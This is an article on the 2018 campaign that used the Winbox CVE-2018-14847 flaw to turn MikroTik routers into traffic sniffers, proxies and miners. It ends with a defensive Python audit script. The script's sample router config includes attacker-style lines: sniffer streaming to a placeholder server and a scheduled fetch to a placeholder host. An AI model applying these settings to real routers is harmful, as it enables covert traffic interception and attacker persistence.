Your Router from MikroTik Could Be Spying on You. If you or your company own a MikroTik router, it could be spying on you or making someone rich at your bandwidth's expense. Researchers from Qihoo 360 Netlab discovered that attackers are exploiting a vulnerability in these routers to forward copies of the traffic passing through them to IP addresses of their choosing, effectively eavesdropping on your or your company's internet activity.
Anything that crosses the router unencrypted (plain HTTP, FTP, POP3/IMAP logins, SNMP) is readable the moment it reaches the attacker: session cookies, email addresses, credentials, card numbers typed into non-HTTPS forms. Traffic protected by TLS still leaks metadata such as which hosts were contacted and when, and would only give up its contents if the attacker could break or bypass the encryption.
Your MikroTik router could be one of the more than 7,500 devices Netlab found forwarding captured traffic, or one of the much larger group (over 239,000 by Netlab's count) on which the Socks4 proxy had been maliciously enabled and a crypto-mining script injected. These numbers can only grow, because the attackers keep scanning for further vulnerable routers and use the ones they already control to do it. Netlab's own scan found roughly 370,000 MikroTik routers still exposed to this attack.
That number may seem small, but one router can serve anywhere from a single user to several hundred. Most of the affected routers are in Brazil, the United States, India and Russia, with Russia the worst hit; that fits with MikroTik being a Latvian company whose hardware is widely distributed in Russia.
The attackers use a previously disclosed vulnerability, reportedly also used by the CIA, known as Winbox Any Directory File Read (CVE-2018-14847). It lets an unauthenticated attacker read arbitrary files off the router through the Winbox service, including the stored user database, which hands over the admin credentials and with them full control of the configuration. With that access the attackers enable the router's Socks4 proxy (giving them a way back into the device and the network behind it that sidesteps the firewall), configure the router's built-in packet sniffer to stream copies of traffic to a server they control, and turn on the web proxy with a modified error page. The page carries a Coinhive crypto-mining script, so every time the proxy hands a user its HTTP 403 page, someone gets richer. Netlab's report adds:
"…By doing this, the attacker hopes to perform web mining for all the proxy traffic on the users' devices… What is disappointing for the attacker, though, is that the mining code does not work this way, because all the external web resources, including those from coinhive.com necessary for web mining, are blocked by the proxy ACLs set by the attackers themselves."
Among the ports the attackers single out for capture, the SNMP ports 161 and 162, which ordinary users rarely touch, stand out, and Netlab could not determine why. Administrators should look into this on their own networks. In Netlab's words:
"We also noticed that the SNMP ports 161 and 162 are also at the top of the list. This deserves some questions: why is the attacker paying attention to a network management protocol regular users barely use? Are they trying to monitor and capture some special users' network SNMP community strings?"
The fix is for network administrators to upgrade RouterOS to a release containing MikroTik's patch for the vulnerability (shipped in April 2018), and then to change the router's passwords, since the flaw exposes the stored credentials and a patch does not invalidate ones already stolen. But as the Chinese researchers point out, a patch only helps once it is applied: their scan found over a million MikroTik devices reachable on the internet, about 370,000 of them still vulnerable. Rebooting won't clean an infected router either. The malicious settings live in the router's saved configuration and survive a reboot, and a scheduled task keeps reporting the router's current IP address back to the attackers.
Given time, if routers stay unpatched, the attackers could also fix their proxy ACL mistake and get the Coinhive mining working. Administrators are urged to keep checking their routers' HTTP proxy, Socks4 proxy and packet-sniffer settings, as well as the traffic those services generate, for signs of tampering. Netlab also recommends that MikroTik add a function that denies inbound internet access to the Webfig and Winbox ports.
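The checks above can be turned into a script. The following is an added example, not code from Netlab or MikroTik: it reads the plain-text output of a RouterOS `/export` (copy it off the router and pipe it in) and flags the configuration changes the article describes, namely an enabled Socks proxy and its access list, packet-sniffer streaming, an enabled web proxy with a NAT redirect steering port 80 into it, scheduler tasks that fetch remote URLs, and management services with no address restriction. The sample export embedded in the script is constructed for illustration; its addresses are RFC 5737 documentation ranges standing in for attacker infrastructure, and the set of indicators is this example's own choice.

```python
"""Audit a RouterOS `/export` dump for the tampering described in the article.

Added example, not Netlab's or MikroTik's code. Usage:
    python audit_export.py < export.rsc
With no piped input it audits the constructed SAMPLE_EXPORT below.
"""
import re
import sys
from typing import Dict, List, Tuple

# Constructed sample of what `/export` might print on a tampered router.
# 203.0.113.0/24 is a documentation range used here as a placeholder.
SAMPLE_EXPORT = """\
# sep/04/2018 10:15:22 by RouterOS 6.40.1
/ip socks
set enabled=yes port=4153
/ip socks access
add action=allow src-address=203.0.113.0/25
add action=deny
/tool sniffer
set filter-ip-protocol=tcp filter-port=20,21,25,110,143,161,162 \\
    streaming-enabled=yes streaming-server=203.0.113.9
/ip proxy
set enabled=yes port=8080
/ip firewall nat
add action=redirect chain=dstnat dst-port=80 protocol=tcp to-ports=8080
/system scheduler
add interval=1d name=upd on-event="/tool fetch url=http://203.0.113.9/r.php mode=http"
/ip service
set winbox port=8291
set www port=80
"""

# key=value pairs; values may be double-quoted strings containing spaces.
KV_RE = re.compile(r'(\S+?)=("(?:[^"\\]|\\.)*"|\S+)')

Command = Tuple[str, str, Dict[str, str]]  # (section, verb, params)


def parse_export(text: str) -> List[Command]:
    """Turn `/export` text into (section, verb, params) triples.

    RouterOS wraps long lines with a trailing backslash; those are joined first.
    A positional item name (e.g. `set winbox ...`) is stored under '_name'.
    """
    joined = re.sub(r'\\\n\s*', ' ', text)
    commands: List[Command] = []
    section = ''
    for raw in joined.splitlines():
        line = raw.strip()
        if not line or line.startswith('#'):
            continue
        if line.startswith('/'):
            section = line          # e.g. "/ip socks access"
            continue
        verb, _, rest = line.partition(' ')
        params: Dict[str, str] = {}
        first = rest.split(' ', 1)[0] if rest else ''
        if first and '=' not in first:
            params['_name'] = first
        params.update({k: v.strip('"') for k, v in KV_RE.findall(rest)})
        commands.append((section, verb, params))
    return commands


def audit_export(text: str) -> List[str]:
    """Return one finding per indicator present; an empty list means nothing was flagged."""
    cmds = parse_export(text)
    findings: List[str] = []
    proxy_port = None
    for section, _verb, p in cmds:
        if section == '/ip socks' and p.get('enabled') == 'yes':
            findings.append(f"SOCKS: proxy enabled on port {p.get('port', '1080')}")
        elif section == '/ip socks access' and p.get('action') == 'allow':
            findings.append(f"SOCKS: access allowed from {p.get('src-address', 'any')}")
        elif section == '/tool sniffer' and p.get('streaming-enabled') == 'yes':
            findings.append(f"SNIFFER: streaming captures to {p.get('streaming-server', '?')} "
                            f"(ports {p.get('filter-port', 'all')})")
        elif section == '/ip proxy' and p.get('enabled') == 'yes':
            proxy_port = p.get('port', '8080')
            findings.append(f"PROXY: web proxy enabled on port {proxy_port}; inspect its error page")
        elif section == '/system scheduler' and 'fetch' in p.get('on-event', ''):
            findings.append(f"SCHEDULER: task {p.get('name', '?')} runs fetch: {p['on-event']}")
        elif (section == '/ip service' and p.get('_name') in ('winbox', 'www', 'www-ssl', 'api', 'api-ssl')
              and 'address' not in p and p.get('disabled') != 'yes'):
            findings.append(f"SERVICE: {p['_name']} has no address= restriction")
    # Second pass: NAT redirects that steer traffic into the (now known) proxy port.
    for section, _verb, p in cmds:
        if section == '/ip firewall nat' and p.get('action') == 'redirect' and p.get('to-ports') == proxy_port:
            findings.append(f"NAT: dst-port {p.get('dst-port')} redirected into proxy port {proxy_port}")
    return findings


if __name__ == '__main__':
    text = SAMPLE_EXPORT if sys.stdin.isatty() else sys.stdin.read()
    for finding in audit_export(text) or ['no indicators found']:
        print(finding)
```

A router that is merely misconfigured can trip the SERVICE and PROXY checks on its own, so treat the output as a list of things to verify against your change records rather than as proof of compromise; a SNIFFER or SCHEDULER hit that nobody on the team recognises is the one to escalate first.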